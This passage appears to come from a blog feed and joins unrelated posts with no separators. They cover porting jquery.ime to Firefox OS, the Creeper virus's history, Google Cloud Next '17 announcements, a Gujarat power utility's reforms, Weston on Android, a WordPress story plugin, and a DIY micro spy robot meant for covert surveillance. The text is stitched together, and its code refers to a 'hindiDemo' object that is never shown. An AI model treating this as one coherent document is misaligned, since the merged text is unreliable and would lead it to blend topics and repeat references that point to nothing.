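A real port would keep pattern data like this in per-language rule files, much as jquery.ime already does, so it is mainly the jQuery plumbing around the rules that needs to change.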


For testing the feasibility, I thought of quickly hacking up an IME for Hindi, which is the Indian language I'm most comfortable with. The OS-side implementation was easy enough, and I tweaked the keyboard settings to include a 'Hindi' keyboard as one of the options.


The IME is not perfect as such, and there are a lot of problems with the input, especially when the words become long. I'm sure that can be sorted out, and since I'm not familiar with IMEs it would be a good learning opportunity as well.

Fortunately, there is no need to reset Gaia on my Keon again and again; testing can be done on Firefox Nightly. Here's a demo of the Hindi IME.








The code structure of jquery.ime is very neatly organised, and this quick hack shows that, with the proper adaptation, jquery.ime could enable not just Indian language support but most of the 62 different languages supported by the library in Firefox OS.

The major task in the project will be to convert all the jQuery-specific code into plain JavaScript, while maintaining cross-browser support (for use in other projects).
After that, I feel it will be relatively easy to introduce most of the input methods available in jquery.ime into Firefox OS. There is a lot of routine work to be done for all the different IMEs, so I'm also planning an automatic porting tool, written in Python, to generate the required folders and populate them with the requisite files containing the patterns of the various languages.
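
As a rough sketch of what the ported library's entry point could look like, the jQuery plugin wrapper could be replaced by a plain global or CommonJS module. The names ime, register and load below are my assumptions, not a settled API.

// Hypothetical replacement for the jQuery plugin object: a plain JavaScript
// registry that frameworks like AngularJS or EmberJS could use directly.
var ime = {
    inputMethods: {},
    // Register a rule set, such as the hindiDemo object sketched earlier.
    register: function ( rules ) {
        this.inputMethods[ rules.id ] = rules;
    },
    // Look up a registered input method by its id.
    load: function ( id ) {
        return this.inputMethods[ id ] || null;
    }
};

// Expose it for both browser globals and CommonJS-style consumers.
if ( typeof module !== 'undefined' && module.exports ) {
    module.exports = ime;
} else {
    window.ime = ime;
}

// Example usage: ime.register( hindiDemo ); ime.load( 'hi-demo' );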

Looking forward to the project.

Update: Although the IME is not complete, the proof of concept code is available here: https://gist.github.com/psbots/aa1887f0a53c61611061



          Happy Birthday viruses        

Malware becomes a 40 something
It is the 40th birthday of the world's first computer virus. In the early 1950s the genius mathematician John von Neumann worked out that it was possible to create a self-replicating piece of computer code. However, no one really took that seriously; after all, who wanted their in-basket full of penis spam?

But in 1971, Bob Thomas, an employee of a company working on building ARPANET, the Internet’s daddy, managed to write a bit of code to do just that. It was all a bit of a laugh really. Creeper looked for a machine on the network, transferred to it, displayed the message “I’m the creeper, catch me if you can!” and started over, thereby hopping from system to system.

Of course the ARPANET employee did not know that his proof of concept virus would prove that computer viruses and the Internet go together like love and marriage. Since Creeper was written, malware instances have rocketed from 1,300 in 1990, to 50,000 in 2000, to over 200 million in 2010.

More here.



          100 announcements (!) from Google Cloud Next '17        

San Francisco — What a week! Google Cloud Next ‘17 has come to an end, but really, it’s just the beginning. We welcomed 10,000+ attendees including customers, partners, developers, IT leaders, engineers, press, analysts, cloud enthusiasts (and skeptics). Together we engaged in 3 days of keynotes, 200+ sessions, and 4 invitation-only summits. Hard to believe this was our first show as all of Google Cloud with GCP, G Suite, Chrome, Maps and Education. Thank you to all who were here with us in San Francisco this week, and we hope to see you next year.

If you’re a fan of video highlights, we’ve got you covered. Check out our Day 1 keynote (in less than 4 minutes) and Day 2 keynote (in under 5!).

One of the common refrains from customers and partners throughout the conference was “Wow, you’ve been busy. I can’t believe how many announcements you’ve had at Next!” So we decided to count all the announcements from across Google Cloud and in fact we had 100 (!) announcements this week.

For the list lovers amongst you, we’ve compiled a handy-dandy run-down of our announcements from the past few days:


Google Cloud is excited to welcome two new acquisitions to the Google Cloud family this week, Kaggle and AppBridge.

1. Kaggle - Kaggle is one of the world's largest communities of data scientists and machine learning enthusiasts. Kaggle and Google Cloud will continue to support machine learning training and deployment services in addition to offering the community the ability to store and query large datasets.

2. AppBridge - Google Cloud acquired Vancouver-based AppBridge this week, which helps you migrate data from on-prem file servers into G Suite and Google Drive.


Google Cloud brings a suite of new security features to Google Cloud Platform and G Suite designed to help safeguard your company’s assets and prevent disruption to your business: 

3. Identity-Aware Proxy (IAP) for Google Cloud Platform (Beta) - Identity-Aware Proxy lets you provide access to applications based on risk, rather than using a VPN. It provides secure application access from anywhere, restricts access by user, identity and group, deploys with integrated phishing resistant Security Key and is easier to setup than end-user VPN.

4. Data Loss Prevention (DLP) for Google Cloud Platform (Beta) - Data Loss Prevention API lets you scan data for 40+ sensitive data types, and is used as part of DLP in Gmail and Drive. You can find and redact sensitive data stored in GCP, invigorate old applications with new sensitive data sensing “smarts” and use predefined detectors as well as customize your own.

5. Key Management Service (KMS) for Google Cloud Platform (GA) - Key Management Service allows you to generate, use, rotate, and destroy symmetric encryption keys for use in the cloud.

6. Security Key Enforcement (SKE) for Google Cloud Platform (GA) - Security Key Enforcement allows you to require security keys be used as the 2-Step verification factor for enhanced anti-phishing security whenever a GCP application is accessed.

7. Vault for Google Drive (GA) - Google Vault is the eDiscovery and archiving solution for G Suite. Vault enables admins to easily manage their G Suite data lifecycle and search, preview and export the G Suite data in their domain. Vault for Drive enables full support for Google Drive content, including Team Drive files.

8. Google-designed security chip, Titan - Google uses Titan to establish hardware root of trust, allowing us to securely identify and authenticate legitimate access at the hardware level. Titan includes a hardware random number generator, performs cryptographic operations in the isolated memory, and has a dedicated secure processor (on-chip).


New GCP data analytics products and services help organizations solve business problems with data, rather than spending time and resources building, integrating and managing the underlying infrastructure:

9. BigQuery Data Transfer Service (Private Beta) - BigQuery Data Transfer Service makes it easy for users to quickly get value from all their Google-managed advertising datasets. With just a few clicks, marketing analysts can schedule data imports from Google Adwords, DoubleClick Campaign Manager, DoubleClick for Publishers and YouTube Content and Channel Owner reports.

10. Cloud Dataprep (Private Beta) - Cloud Dataprep is a new managed data service, built in collaboration with Trifacta, that makes it faster and easier for BigQuery end-users to visually explore and prepare data for analysis without the need for dedicated data engineer resources.

11. New Commercial Datasets - Businesses often look for datasets (public or commercial) outside their organizational boundaries. Commercial datasets offered include financial market data from Xignite, residential real-estate valuations (historical and projected) from HouseCanary, predictions for when a house will go on sale from Remine, historical weather data from AccuWeather, and news archives from Dow Jones, all immediately ready for use in BigQuery (with more to come as new partners join the program).

12. Python for Google Cloud Dataflow in GA - Cloud Dataflow is a fully managed data processing service supporting both batch and stream execution of pipelines. Until recently, these benefits have been available solely to Java developers. Now there’s a Python SDK for Cloud Dataflow in GA.

13. Stackdriver Monitoring for Cloud Dataflow (Beta) - We’ve integrated Cloud Dataflow with Stackdriver Monitoring so that you can access and analyze Cloud Dataflow job metrics and create alerts for specific Dataflow job conditions.

14. Google Cloud Datalab in GA - This interactive data science workflow tool makes it easy to do iterative model and data analysis in a Jupyter notebook-based environment using standard SQL, Python and shell commands.

15. Cloud Dataproc updates - Our fully managed service for running Apache Spark, Flink and Hadoop pipelines has new support for restarting failed jobs (including automatic restart as needed) in beta, the ability to create single-node clusters for lightweight sandbox development, also in beta, and GPU support; the cloud labels feature, for more flexibility in managing your Dataproc resources, is now GA.


New GCP databases and database features round out a platform on which developers can build great applications across a spectrum of use cases:

16. Cloud SQL for PostgreSQL (Beta) - Cloud SQL for PostgreSQL implements the same design principles currently reflected in Cloud SQL for MySQL, namely, the ability to securely store and connect to your relational data via open standards.

17. Microsoft SQL Server Enterprise (GA) - Available on Google Compute Engine, plus support for Windows Server Failover Clustering (WSFC) and SQL Server AlwaysOn Availability (GA).

18. Cloud SQL for MySQL improvements - Increased performance for demanding workloads via 32-core instances with up to 208GB of RAM, and central management of resources via Identity and Access Management (IAM) controls.

19. Cloud Spanner - Launched a month ago, but still, it would be remiss not to mention it because, hello, it’s Cloud Spanner! The industry’s first horizontally scalable, globally consistent, relational database service.

20. SSD persistent-disk performance improvements - SSD persistent disks now have increased throughput and IOPS performance, which are particularly beneficial for database and analytics workloads. Read these docs for complete details about persistent-disk performance.

21. Federated query on Cloud Bigtable - We’ve extended BigQuery’s reach to query data inside Cloud Bigtable, the NoSQL database service for massive analytic or operational workloads that require low latency and high throughput (particularly common in Financial Services and IoT use cases).


New GCP Cloud Machine Learning services bolster our efforts to make machine learning accessible to organizations of all sizes and sophistication:

22.  Cloud Machine Learning Engine (GA) - Cloud ML Engine, now generally available, is for organizations that want to train and deploy their own models into production in the cloud.

23. Cloud Video Intelligence API (Private Beta) - A first of its kind, Cloud Video Intelligence API lets developers easily search and discover video content by providing information about entities (nouns such as “dog,” “flower”, or “human” or verbs such as “run,” “swim,” or “fly”) inside video content.

24. Cloud Vision API (GA) - Cloud Vision API reaches GA and offers new capabilities for enterprises and partners to classify a more diverse set of images. The API can now recognize millions of entities from Google’s Knowledge Graph and offers enhanced OCR capabilities that can extract text from scans of text-heavy documents such as legal contracts or research papers or books.

25. Machine learning Advanced Solution Lab (ASL) - ASL provides dedicated facilities for our customers to directly collaborate with Google’s machine-learning experts to apply ML to their most pressing challenges.

26. Cloud Jobs API - A powerful aid to job search and discovery, Cloud Jobs API now has new features such as Commute Search, which will return relevant jobs based on desired commute time and preferred mode of transportation.

27. Machine Learning Startup Competition - We announced a Machine Learning Startup Competition in collaboration with venture capital firms Data Collective and Emergence Capital, and with additional support from a16z, Greylock Partners, GV, Kleiner Perkins Caufield & Byers and Sequoia Capital.


New GCP pricing continues our intention to create customer-friendly pricing that’s as smart as our products; and support services that are geared towards meeting our customers where they are:

28. Compute Engine price cuts - Continuing our history of pricing leadership, we’ve cut Google Compute Engine prices by up to 8%.

29. Committed Use Discounts - With Committed Use Discounts, customers can receive a discount of up to 57% off our list price, in exchange for a one or three year purchase commitment paid monthly, with no upfront costs.

30. Free trial extended to 12 months - We’ve extended our free trial from 60 days to 12 months, allowing you to use your $300 credit across all GCP services and APIs, at your own pace and schedule. Plus, we’ve introduced new Always Free products -- non-expiring usage limits that you can use to test and develop applications at no cost. Visit the Google Cloud Platform Free Tier page for details.

31. Engineering Support - Our new Engineering Support offering is a role-based subscription model that allows us to match engineer to engineer, to meet you where your business is, no matter what stage of development you’re in. It has 3 tiers:

  • Development engineering support - ideal for developers or QA engineers that can manage with a response within four to eight business hours, priced at $100/user per month.
  • Production engineering support provides a one-hour response time for critical issues at $250/user per month.
  • On-call engineering support pages a Google engineer and delivers a 15-minute response time 24x7 for critical issues at $1,500/user per month.

32. Cloud.google.com/community site - Google Cloud Platform Community is a new site to learn, connect and share with other people like you, who are interested in GCP. You can follow along with tutorials or submit one yourself, find meetups in your area, and learn about community resources for GCP support, open source projects and more.


New GCP developer platforms and tools reinforce our commitment to openness and choice and giving you what you need to move fast and focus on great code.

33. Google App Engine Flex (GA) - We announced a major expansion of our popular App Engine platform to new developer communities that emphasizes openness, developer choice, and application portability.

34. Cloud Functions (Beta) - Google Cloud Functions has launched into public beta. It is a serverless environment for creating event-driven applications and microservices, letting you build and connect cloud services with code. A minimal code sketch appears after this list.

35. Firebase integration with GCP (GA) - Firebase Storage is now Google Cloud Storage for Firebase and adds support for multiple buckets, support for linking to existing buckets, and integrates with Google Cloud Functions.

36. Cloud Container Builder - Cloud Container Builder is a standalone tool that lets you build your Docker containers on GCP regardless of deployment environment. It’s a fast, reliable, and consistent way to package your software into containers as part of an automated workflow.

37. Community Tutorials (Beta)  - With community tutorials, anyone can now submit or request a technical how-to for Google Cloud Platform.
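
To give a flavour of the Cloud Functions model mentioned in item 34, here is a minimal sketch of an HTTP-triggered function in Node.js. The function name helloHttp and the greeting are placeholder assumptions, not anything from the announcement.

// index.js: a tiny HTTP-triggered Cloud Function sketch (Node.js).
// helloHttp is an arbitrary example name, not an official sample.
exports.helloHttp = function (req, res) {
  // req and res are Express-style request and response objects.
  var name = (req.query && req.query.name) || (req.body && req.body.name) || 'World';
  res.status(200).send('Hello, ' + name + '!');
};

At the time of the beta, a function like this could be deployed with something along the lines of gcloud beta functions deploy helloHttp --trigger-http, though the exact command and flags may differ.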


Secure, global and high-performance, we’ve built our cloud for the long haul. This week we announced a slew of new infrastructure updates. 

38. New data center region: California - This new GCP region delivers lower latency for customers on the West Coast of the U.S. and adjacent geographic areas. Like other Google Cloud regions, it will feature a minimum of three zones, benefit from Google’s global, private fibre network, and offer a complement of GCP services.

39. New data center region: Montreal - This new GCP region delivers lower latency for customers in Canada and adjacent geographic areas. Like other Google Cloud regions, it will feature a minimum of three zones, benefit from Google’s global, private fibre network, and offer a complement of GCP services.

40. New data center region: Netherlands - This new GCP region delivers lower latency for customers in Western Europe and adjacent geographic areas. Like other Google Cloud regions, it will feature a minimum of three zones, benefit from Google’s global, private fibre network, and offer a complement of GCP services.

41. Google Container Engine - Managed Nodes - Google Container Engine (GKE) has added Automated Monitoring and Repair of your GKE nodes, letting you focus on your applications while Google ensures your cluster is available and up-to-date.

42. 64 Core machines + more memory - We have doubled the number of vCPUs you can run in an instance from 32 to 64 and up to 416GB of memory per instance.

43. Internal Load balancing (GA) - Internal Load Balancing, now GA, lets you run and scale your services behind a private load balancing IP address which is accessible only to your internal instances, not the internet.

44. Cross-Project Networking (Beta) - Cross-Project Networking (XPN), now in beta, is a virtual network that provides a common network across several Google Cloud Platform projects, enabling simple multi-tenant deployments.


In the past year, we’ve launched 300+ features and updates for G Suite and this week we announced our next generation of collaboration and communication tools.

45. Team Drives (GA for G Suite Business, Education and Enterprise customers) - Team Drives help teams simply and securely manage permissions, ownership and file access for an organization within Google Drive.

46. Drive File Stream (EAP) - Drive File Stream is a way to quickly stream files directly from the cloud to your computer. With Drive File Stream, company data can be accessed directly from your laptop, even if you don’t have much space on your hard drive.

47. Google Vault for Drive (GA for G Suite Business, Education and Enterprise customers) - Google Vault for Drive now gives admins the governance controls they need to manage and secure all of their files, including employee Drives and Team Drives. Google Vault for Drive also lets admins set retention policies that automatically keep what’s needed and delete what’s not.

48. Quick Access in Team Drives (GA) - powered by Google’s machine intelligence, Quick Access helps to surface the right information for employees at the right time within Google Drive. Quick Access now works with Team Drives on iOS and Android devices, and is coming soon to the web.

49. Hangouts Meet (GA to existing customers) - Hangouts Meet is a new video meeting experience built on Hangouts that can run 30-person video conferences without accounts, plugins or downloads. For G Suite Enterprise customers, each call comes with a dedicated dial-in phone number so that team members on the road can join meetings without wifi or data issues.

50. Hangouts Chat (EAP) - Hangouts Chat is an intelligent communication app in Hangouts with dedicated, virtual rooms that connect cross-functional enterprise teams. Hangouts Chat integrates with G Suite apps like Drive and Docs, as well as photos, videos and other third-party enterprise apps.

51. @meet - @meet is an intelligent bot built on top of the Hangouts platform that uses natural language processing and machine learning to automatically schedule meetings for your team with Hangouts Meet and Google Calendar.

52. Gmail Add-ons for G Suite (Developer Preview) - Gmail Add-ons provide a way to surface the functionality of your app or service directly in Gmail. With Add-ons, developers only build their integration once, and it runs natively in Gmail on web, Android and iOS.

53. Edit Opportunities in Google Sheets - with Edit Opportunities in Google Sheets, sales reps can sync a Salesforce Opportunity List View to Sheets to bulk edit data and changes are synced automatically to Salesforce, no upload required.

54. Jamboard - Our whiteboard in the cloud goes GA in May! Jamboard merges the worlds of physical and digital creativity. It’s real time collaboration on a brilliant scale, whether your team is together in the conference room or spread all over the world.


Building on the momentum from a growing number of businesses using Chrome digital signage and kiosks, we added new management tools and APIs in addition to introducing support for Android Kiosk apps on supported Chrome devices. 

55. Android Kiosk Apps for Chrome - Android Kiosk for Chrome lets users manage and deploy Chrome digital signage and kiosks for both web and Android apps. And with Public Session Kiosks, IT admins can now add a number of Chrome packaged apps alongside hosted apps.

56. Chrome Kiosk Management Free trial - This free trial gives customers an easy way to test out Chrome for signage and kiosk deployments.

57. Chrome Device Management (CDM) APIs for Kiosks - These APIs offer programmatic access to various Kiosk policies. IT admins can schedule a device reboot through the new APIs and integrate that functionality directly in a third-party console.

58. Chrome Stability API - This new API allows Kiosk app developers to improve the reliability of the application and the system.


Attendees at Google Cloud Next ‘17 heard stories from many of our valued customers:

59. Colgate - Colgate-Palmolive partnered with Google Cloud and SAP to bring thousands of employees together through G Suite collaboration and productivity tools. The company deployed G Suite to 28,000 employees in less than six months.

60. Disney Consumer Products & Interactive (DCPI) - DCPI is on target to migrate out of its legacy infrastructure this year, and is leveraging machine learning to power next generation guest experiences.

61. eBay - eBay uses Google Cloud technologies including Google Container Engine, Machine Learning and AI for its ShopBot, a personal shopping bot on Facebook Messenger.

62. HSBC - HSBC is one of the world's largest financial and banking institutions and making a large investment in transforming its global IT. The company is working closely with Google to deploy Cloud DataFlow, BigQuery and other data services to power critical proof of concept projects.

63. LUSH - LUSH migrated its global e-commerce site from AWS to GCP in less than six weeks, significantly improving the reliability and stability of its site. LUSH benefits from GCP’s ability to scale as transaction volume surges, which is critical for a retail business. In addition, Google's commitment to renewable energy sources aligns with LUSH's ethical principles.

64. Oden Technologies - Oden was part of Google Cloud’s startup program, and switched its entire platform to GCP from AWS. GCP offers Oden the ability to reliably scale while keeping costs low, perform under heavy loads and consistently delivers sophisticated features including machine learning and data analytics.

65. Planet - Planet migrated to GCP in February, looking to accelerate their workloads and leverage Google Cloud for several key advantages: price stability and predictability, custom instances, first-class Kubernetes support, and Machine Learning technology. Planet also announced the beta release of their Explorer platform.

66. Schlumberger - Schlumberger is making a critical investment in the cloud, turning to GCP to enable high-performance computing, remote visualization and development velocity. GCP is helping Schlumberger deliver innovative products and services to its customers by using HPC to scale data processing, workflow and advanced algorithms.

67. The Home Depot - The Home Depot collaborated with GCP’s Customer Reliability Engineering team to migrate HomeDepot.com to the cloud in time for Black Friday and Cyber Monday. Moving to GCP has allowed the company to better manage huge traffic spikes at peak shopping times throughout the year.

68. Verizon - Verizon is deploying G Suite to more than 150,000 of its employees, allowing for collaboration and flexibility in the workplace while maintaining security and compliance standards. Verizon and Google Cloud have been working together for more than a year to bring simple and secure productivity solutions to Verizon’s workforce.


We brought together Google Cloud partners from our growing ecosystem across G Suite, GCP, Maps, Devices and Education. Our partnering philosophy is driven by a set of principles that emphasize openness, innovation, fairness, transparency and shared success in the cloud market. Here are some of our partners who were out in force at the show:

69. Accenture - Accenture announced that it has designed a mobility solution for Rentokil, a global pest control company, built in collaboration with Google as part of the partnership announced at Horizon in September.

70. Alooma - Alooma announced the integration of the Alooma service with Google Cloud SQL and BigQuery.

71. Authorized Training Partner Program - To help companies scale their training offerings more quickly, and to enable Google to add other training partners to the ecosystem, we are introducing a new track within our partner program to support their unique offerings and needs.

72. Check Point - Check Point® Software Technologies announced Check Point vSEC for Google Cloud Platform, delivering advanced security integrated with GCP as well as their joining of the Google Cloud Technology Partner Program.

73. CloudEndure - We’re collaborating with CloudEndure to offer a no cost, self-service migration tool for Google Cloud Platform (GCP) customers.

74. Coursera - Coursera announced that it is collaborating with Google Cloud Platform to provide an extensive range of Google Cloud training courses. To celebrate this announcement, Coursera is offering all NEXT attendees a 100% discount on the GCP fundamentals class.

75. DocuSign - DocuSign announced deeper integrations with Google Docs.

76. Egnyte - Egnyte announced an enhanced integration with Google Docs that will allow our joint customers to create, edit, and store Google Docs, Sheets and Slides files right from within Egnyte Connect.

77. Google Cloud Global Partner Awards - We recognized 12 Google Cloud partners that demonstrated strong customer success and solution innovation over the past year: Accenture, Pivotal, LumApps, Slack, Looker, Palo Alto Networks, Virtru, SoftBank, DoIT, Snowdrop Solutions, CDW Corporation, and SYNNEX Corporation.

78. iCharts - iCharts announced additional support for several GCP databases, free pivot tables for current Google BigQuery users, and a new product dubbed “iCharts for SaaS.”

79. Intel - In addition to the progress with Skylake, Intel and Google Cloud launched several technology initiatives and market education efforts covering IoT, Kubernetes and TensorFlow, including optimizations, a developer program and tool kits.

80. Intuit - Intuit announced Gmail Add-Ons, which are designed to integrate custom workflows into Gmail based on the context of a given email.

81. Liftigniter - Liftigniter is a member of Google Cloud’s startup program and focused on machine learning personalization using predictive analytics to improve CTR on web and in-app.

82. Looker - Looker launched a suite of Looker Blocks, compatible with Google BigQuery Data Transfer Service, designed to give marketers the tools to enhance analysis of their critical data.

83. Low interest loans for partners - To help Premier Partners grow their teams, Google announced that capital investments are available to qualified partners in the form of low-interest loans.

84. MicroStrategy - MicroStrategy announced an integration with Google Cloud SQL for PostgreSQL and Google Cloud SQL for MySQL.

85. New incentives to accelerate partner growth - We are increasing our investments in multiple existing and new incentive programs, including low-interest loans to help Premier Partners grow their teams, increasing co-funding to accelerate deals, and expanding our rebate programs.

86. Orbitera Test Drives for GCP Partners - Test Drives allow customers to try partners’ software and generate high quality leads that can be passed directly to the partners’ sales teams. Google is offering Premier Cloud Partners one year of free Test Drives on Orbitera.

87. Partner specializations - Partners demonstrating strong customer success and technical proficiency in certain solution areas will now qualify to apply for a specialization. We’re launching specializations in application development, data analytics, machine learning and infrastructure.

88. Pivotal - GCP announced Pivotal as our first CRE technology partner. CRE technology partners will work hand-in-hand with Google to thoroughly review their solutions and implement changes to address identified risks to reliability.

89. ProsperWorks - ProsperWorks announced Gmail Add-Ons, which are designed to integrate custom workflows into Gmail based on the context of a given email.

90. Qwiklabs - This recent acquisition will provide Authorized Training Partners the ability to offer hands-on labs and comprehensive courses developed by Google experts to our customers.

91. Rackspace - Rackspace announced a strategic relationship with Google Cloud to become its first managed services support partner for GCP, with plans to collaborate on a new managed services offering for GCP customers set to launch later this year.

92. Rocket.Chat - Rocket.Chat, a member of Google Cloud’s startup program, is adding a number of new product integrations with GCP, including Autotranslate via the Translate API, integration with the Vision API to screen for inappropriate content, integration with the NLP API to perform sentiment analysis on public channels, integration with G Suite for authentication and a full move of back-end storage to Google Cloud Storage.

93. Salesforce - Salesforce announced Gmail Add-Ons, which are designed to integrate custom workflows into Gmail based on the context of a given email.

94. SAP - This strategic partnership includes certification of SAP HANA on GCP, new G Suite integrations and future collaboration on building machine learning features into intelligent applications like conversational apps that guide users through complex workflows and transactions.

95. Smyte - Smyte participated in the Google Cloud startup program and protects millions of actions a day on websites and mobile applications. Smyte recently moved from self-hosted Kubernetes to Google Container Engine (GKE).

96. Veritas - Veritas expanded its partnership with Google Cloud to provide joint customers with 360 Data Management capabilities. The partnership will help reduce data storage costs, increase compliance and eDiscovery readiness and accelerate the customer’s journey to Google Cloud Platform.

97. VMware Airwatch - Airwatch provides enterprise mobility management solutions for Android and continues to drive the Google Device ecosystem to enterprise customers.

98. Windows Partner Program - We’re working with top systems integrators in the Windows community to help GCP customers take full advantage of Windows and .NET apps and services on our platform.

99. Xplenty - Xplenty announced the addition of two new services from Google Cloud into their available integrations: Google Cloud Spanner and Google Cloud SQL for PostgreSQL.

100. Zoomdata - Zoomdata announced support for Google’s Cloud Spanner and PostgreSQL on GCP, as well as enhancements to the existing Zoomdata Smart Connector for Google BigQuery. With these new capabilities Zoomdata offers deeply integrated and optimized support for Google Cloud Platform’s Cloud Spanner, PostgreSQL, Google BigQuery, and Cloud DataProc services.

We’re thrilled to have so many new products and partners that can help all of our customers grow. And as our final announcement for Google Cloud Next ’17 — please save the date for Next 2018: June 4–6 in San Francisco.

I guess that makes it 101. :-)



          New Initiatives / steps taken by UGVCL to improve operational efficiency         
The Uttar Gujarat Vij Company Limited (UGVCL), the second largest state discom in Gujarat, serving almost 2.9 million customers, has its network spread across an area of 49,950 sq. km. It was rated the second best state power distribution utility by the Ministry of Power (MoP), with due recognition of its excellent performance on the financial front and its ensuing operational improvements and consumer-friendly practices.

The discom is at the forefront in taking effective steps to improve operational efficiency and provide better services to customers. Some of the steps taken have been the introduction of system strengthening schemes, expansion of metering coverage, installation of special design transformers that help in peak load management, an insurance policy to compensate for crops destroyed by fire due to electrical line faults, and the launch of a photo billing system. Through these, the utility has been trying not only to control its rising aggregate technical and commercial (AT&C) losses but also to help in peak load management through the installation of advanced metering infrastructure.

A brief outline of the different steps taken by the discom is given below:

Operational performance

The utility’s AT&C losses have been increasing since 2010-11, when they stood at 6.63%. The losses touched 10.12% in 2011-12 and 14.07% in 2012-13, with the increase attributed to low metering coverage of agricultural consumers, which accounted for only 36.75% of the total metering provided in 2012-13, as compared to 28% in 2008-09. To address this issue, the utility:

  • Releases all new agricultural connections at metered tariffs. In 2013-14, it released 22,278 new agricultural connections and an additional load of 201 MW for existing agricultural connections by installing 3,000 km of High Tension (HT) lines and 55 agricultural feeders, following the bifurcation of existing agricultural feeders
  • Implements the state-sponsored Jyotigram Yojana scheme, introduced in 2006, which ensures 24×7 three-phase quality power; under it, the utility supplies electricity to scattered farmhouses through feeders with specially designed Jyotigram transformers
  • Installs AB conductor cables in theft-prone areas, undertakes mass anti-theft drives, and replaces electromechanical meters with static meters to bring losses below 20% on feeders with higher losses
  • Ensures timely and accurate billing in order to reduce losses, by initiating a photo billing system for 0.2 million consumers, sending billing information to consumers by SMS, and installing radio frequency (RF)-based single-phase meters to avoid human intervention in meter reading
  • Ensures energy conservation, cost efficiency and a reduction in distribution transformer losses through special design transformers, pilot advanced transformers (PATs), which provide single-phase power supply to farmers after the eighth hour; this concept won the utility the 'India Utility Knowledge and Networking Forum (IUKAN) 2014 – Best Practice Award' under the “Innovations and Others” category.

Smart Grid Pilot

UGVCL is one of the utilities shortlisted for the smart grid initiative under the MoP. The project is being undertaken in two districts – Naroda and Deesa. The Rs. 487.8 million pilot project will cover about 375 substations across these districts. The scope of the project covers AT&C loss reduction, peak load management, developing advanced metering infrastructure (AMI), optimisation of unscheduled interchange charges, reduction in meter reading costs, outage management, load forecasting, demand side management and demand response, and the introduction of asset management systems and power quality management.

Five consortiums were shortlisted for a proof of concept (PoC) in March 2014 to demonstrate their AMI connectivity solutions with 300 meters each. On the basis of the evaluation of the PoC and the bid price, the contract for the project will be awarded in September 2014. A few challenges faced by UGVCL at the tendering stage include interoperability issues, the limited expertise of Indian companies, and the absence of mechanisms to test imported technologies in India.

Future Plans

In a nutshell, the utility’s future plans are aimed at strengthening and upgrading its grid infrastructure through various initiatives like adding distribution lines at 11kV and LT levels, including the smart grid pilot. Loss reduction measures and ensuring consumer satisfaction through quality power supply are its top priorities, going forward. 

Please note: Above is the summary of the article on Power Distribution Franchisee model published in PowerLine magazine, April 2014.

Posted by: Kunjan Bagdia @ pManifold

          First light from Weston on Android        
A couple of months ago, Collabora assigned me first to research and then make a proof of concept port of Wayland on Android. I had never even seen an Android before. Yesterday, Weston on Android achieved first light!
Galaxy Nexus running Weston and simple-shm.
That is a Samsung Galaxy Nexus smart phone, running a self-built image of Android 4.0.1. Weston is driving the screen, where you see the simple-shm Wayland client. There is no desktop nor wallpaper, because right now, simple-shm is the only ported client.

How is that possible? Android has no DRI, no DRM, no KMS (the DRM API), no GBM, no Mesa, and for this device the graphics drivers are proprietary and I do not have access to the closed driver source.

Fortunately, Android's self-invented graphics stack has pretty similar requirements to Weston. All it took was to write a new Android specific backend for Weston, that interfaces to the Android APIs. Writing it took roughly three days.

And the rest of the two months? I spent some time studying Android's graphics stack, but the majority of the time sank into porting the minimum required library dependencies, libwayland, Weston, and simple-shm, to the Android platform and build environment. Simply getting the Android build system to build things properly took a huge effort, and then I got to write workarounds for features missing in Android's C library (Bionic). These are features that we have taken for granted on standard Linux operating systems for years. I also had to completely remove signal handling and timers from libwayland, because the signalfd and timerfd interfaces do not exist in Bionic. Those still need to be reinvented.

Android has gralloc and fb hardware abstraction layer (HAL) APIs. Hardware vendors are required to implement these APIs and provide EGL and GL support libraries. These implementations are usually closed and proprietary. On top of these is the Android wrapper-libEGL, written in C++, open source. My first thought was to use the gralloc and fb HAL APIs directly, but it turned out that the wrapper-libEGL does not support using them on the application side. Instead, I was forced to use an Android C++ API (there is no C API for this, as far as I can tell) to get access to the framebuffer in an EGL-compatible way. In the end, I had to write a lot less code than I would have using the HALs directly.

The Android backend for Weston so far only provides basic graphics output to the screen, and offers (presumably) accelerated GLES2 via EGL for the server. No input devices are hooked up yet, so you cannot interact with Weston. I do not know how to get pageflip completion events (if possible?), so that is hacked over.

Simple-shm is the only client that runs for now. There is no support for EGL/GL in Wayland clients. Toytoolkit clients are waiting for Cairo and dependencies to be ported.

The framebuffer can be used by one program at a time. Normally that program is SurfaceFlinger, the Android system compositor. To be able to run Weston, I have to kill SurfaceFlinger and make sure it stays down. Killing SurfaceFlinger also kills the whole Android UI infrastructure. You cannot even power off the phone by pressing or holding down the physical power button!

A video about simple-shm running on Galaxy Nexus:


          Proof of Concept: Choose Your Own Adventure Dashboard Widget        
Ultimately, WordPress is a tool for publishing stories, right? I’m trying to explore how to use WordPress to tell stories. WordPress backend interfaces and dashboards are extremely personal and intimate spaces, and as far as I can tell, largely unexplored as a medium. I’ve created this plugin to test a “choose your own adventure” story …
          Micro Spy Robot - DIY gallery project        

This tiny spy robot can send audio and video and includes night vision

After building my two large video controlled robots (Oberon and Goober) as well as the small sized all terrain spy robot, I wanted to take the miniaturization process as far as I could using inexpensive components. A spy robot needs to have a rock solid video link that is good for at least 500 feet, crystal clear amplified sound pickup, silent motor operation and night vision, so that is a lot of stuff to pack into a small area. Also note that this project was built in 2004, when affordable miniature cameras and video transmitters were kind of a rare thing to find.


I decided to build this project when I finally found a source for an ultra tiny composite video camera with a low lux CCD element that would be good for night vision. I also had a tiny 250mw audio and video transmitter that was hacked from a security system into its absolute minimum size, so the project could finally come together. This version is just a simple proof of concept prototype and will eventually be made less than half the size and have the ability to survive a throw through a window into the target location for stealthy surveillance missions in a hostile environment. The final version will also have some onboard autonomous intelligence so that once it is dropped or thrown into the target location it can quickly sneak into a dark hiding spot, much like a fleeing insect would.

Since I now had the small video camera and the tiny gearbox drive motors on order, I could experiment with some possible layouts and battery pack sizes using a computer CAD program. I originally planned to use very small lithium batteries, but it was found that the current draw from all of the subsystems made the video drop out when the motors were activated, so I decided to go with sub-AA sized rechargeable nickel batteries as these were commonly available for small RC aircraft use. The next version will use a custom made lithium ion battery pack similar to the ones used in cell phones for a much smaller pack and extended run times, but for now the goal was cheap and simple.

I also intended to have a four wheel transmission system with possibly a track drive, but in later experimentation it was found that only two wheels were needed as the little motors had more than enough power to just drag the back of the robot along. The final version will probably have a custom track drive though, as the two wheels would sometimes fail to pull the tiny robot over large carpet runners due to slipping easily on the smooth surfaces.

